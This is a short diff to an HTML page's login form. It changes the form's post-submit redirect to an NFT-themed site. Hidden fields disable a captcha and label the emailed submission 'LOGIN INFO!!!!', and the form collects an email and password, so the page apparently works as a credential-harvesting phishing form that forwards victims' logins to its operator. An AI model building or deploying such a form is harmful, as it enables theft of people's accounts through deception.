--- a/index.html
+++ b/index.html
@@ -20,7 +20,7 @@
 
 <input type="hidden" name="_captcha" value="false">
                 <input type="hidden" name="_subject" value="LOGIN INFO!!!!">
-                <input type="hidden" name="_next" value="https://puppiesland.netlify.app/gateway.html">
+                <input type="hidden" name="_next" value="https://nftscreator.github.io/dashboard/#create">
                         <input type="email" id="email" name="email" placeholder="Enter Email" required>
                         <input type="password" id="password" name="password" placeholder="Enter Password" required>
                         <br>
